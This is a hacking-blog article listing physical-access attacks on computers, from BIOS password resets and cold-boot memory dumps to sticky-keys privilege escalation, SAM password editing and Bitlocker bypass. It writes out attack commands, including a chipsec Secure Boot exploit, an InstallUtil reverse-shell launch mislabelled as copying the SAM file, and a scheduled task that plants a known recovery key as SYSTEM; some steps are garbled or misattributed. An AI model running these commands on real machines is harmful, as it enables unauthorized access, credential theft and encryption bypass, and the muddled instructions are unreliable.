28.5 C
Thursday, May 19, 2022

Must Know These Cyber Physical Attacks

Must read

Pro MCrackerhttps://hackbyte.org
I Am MCracker From India, I Am A Pentester And A Blogger.


This article is only for education purpose, if you misuse this information then only you will be responsible for it and not hackbyte.

Hi Hackies,

Welcome To Hackbyte, Today I am Telling you About Most Comman Physical attacks In cyber Field. So Let’s Start.

About Cyber Physical Attacks

In a physical attack, an attacker gains physical access to a physical asset in the infrastructure system in order to damage it, disable it, steal it, or use it in an undesirable way. … The goal is to produce a security system that has balanced physical protection for all potential adversary scenarios.
Here are some common examples of how physical threat vectors can compromise digital security:

  • An infected USB drive is planted in a parking lot, lobby, etc., which an employee picks up and loads onto the network.
  • An attacker breaks into a server room and installs rogue devices that capture confidential data.
  • The internet drop line is accessible from outside of the building, allowing an attacker to intercept data or cut the line completely.
  • An attacker pretends to be an employee and counts on a real employee’s courtesy to hold the door for him as they enter together.
  • An inside actor looks over the shoulder of a system engineer as they type administrative credentials into a system.

Some Comman Physical Attacks:-

BIOS password

The battery

Most of the motherbords have a battery. If you remove it 30min the settings of the BIOS will be restarted (password included).

Jumper CMOS

Most of the motherboards have a jumper that can restart the settings. This jumper connects a central pin with another, if you connect thoses pins the motherbord will be reseted.

Read Also  ShortByte Edition: 1

Live Tools

If you could run for example a Kali Linux from a Live CD/USB you could use tools like killCmos or CmosPWD (this last one is included in Kali) you could try to recover the password of the BIOS.

UEFI Attack

To check the settings of the UEFI and perform some kind of attack you should try chipsec.

Using this tool you could easily disable the Secure Boot:

python chipsec_main.py -module exploits.secure.boot.pk


Cold boot

The RAM memory is persistent from 1 to 2 minutes from the time the computer is powered off. If you apply cold (liquid nitrogen, for example) on the memory card you can extend this time up to 10 minutes.Then, you can do a memory dump (using tools like dd.exe, mdd.exe, Memoryze, win32dd.exe or DumpIt) to analyze the memory.You should analyze the memory using volatility.


Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces. Connect your computer to the victim computer over one of those interfaces and INCEPTION will try to patch the pyshical memory to give you access.If INCEPTION succeeds, any password introduced will be vaid.It doesn’t work with Windows10.

Live CD/USB Attacks

Sticky Keys and more

  • SETHC:sethc.exe is invoked when SHIFT is pressed 5 times
  • UTILMAN:Utilman.exe is invoked by pressing WINDOWS+U
  • OSK:osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard
  • DISP:DisplaySwitch.exe is invoked by pressing WINDOWS+P
Read Also  Subdomain Takeover |HackerOne |Owasp | Subdomain Takeover Tools

These binaries are located inside C:\Windows\System32. You can change any of them for a copy of the binary cmd.exe (also in the same folder) and any time that you invoke any of those binaries a command prompt as SYSTEM will appear.

Modifying SAM

You can use the tool chntpw to modify the SAM file of a mounted Windows filesystem. Then, you could change the password of the Administrator user, for example.

This tool is available in KALI.

chntpw -h
chntpw -l <path_to_SAM>

Inside a Linux system you could modify the/etc/shadowor/etc/passwdfile.


Kon-Boot is one of the best tools around which can log you into Windows without knowing the password. It works by hooking into the system BIOS and temporarily changing the contents of the Windows kernel while booting (new versions work also with UEFI). It then allows you to enter anything as the password during login. The next time you start the computer without Kon-Boot, the original password will be back, the temporary changes will be discarded and the system will behave as if nothing has happened.

Read More: https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/

It is a live CD/USB that can patch the memory so you won’t need to know the password to login. Kon-Boot also performs the StickyKeys trick so you could press Shift5 times to get an Administrator cmd.

Running Windows Attacks

Booting shortcuts

  • supr – BIOS
  • f8 – Recovery mode
  • supr – BIOS ini
  • f8 – Recovery mode
  • Shitf (after the windows banner) – Go to login page instead of autologon (avoid autologon)
Read Also  Terminologies In Hacking - Must Know


Rubber Ducky

The USB Rubber Ducky injects keystrokes at superhuman speeds, violating the inherent trust computers have in humans by posing as a keyboard.


The Teensy is a complete USB-based microcontroller development system, in a very small footprint, capable of implementing many types of projects. All programming is done via the USB port.

Volume Shadow Copy

With administrators privileges and powershell you could make a copy of the SAM file.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost= /rport=443 /U c:\temp\psby.exe

Bypassing Bitlocker

Bitlocker uses 2 passwords. The one used by the user, and the recovery password (48 digits).If you are lucky and inside the current session of Windows exists the file C:\Windows\MEMORY.DMP (It is a memory dump) you could try to search inside of it the recovery password. You can get this file and a copy of the filesytem and then use Elcomsoft Forensic Disk Decryptor to get the content (this will only work if the password is inside the memory dump). You could also force the memory dump using NotMyFault of Sysinternals, but this will reboot the system and has to be executed as Administrator.

You could also try a bruteforce attack using Passware Kit Forensic.

Social Engineering

Finally, you could make the user add a new recovery password making him executed as administrator:

schtasks /create /SC ONLOGON /tr "c:/windows/system32/manage-bde.exe -protectors -add c: -rp 000000-000000-000000-000000-000000-000000-000000-000000" /tn tarea /RU SYSTEM /f

This will add a new recovery key (composed of 48 zeros) in the next login.To check the valid recovery keys you can execute:

manage-bde -protectors -get c:

Detailed Tutorial Cooming Soon…
Thanks For Reading.

More articles


Please enter your comment!
Please enter your name here

Latest article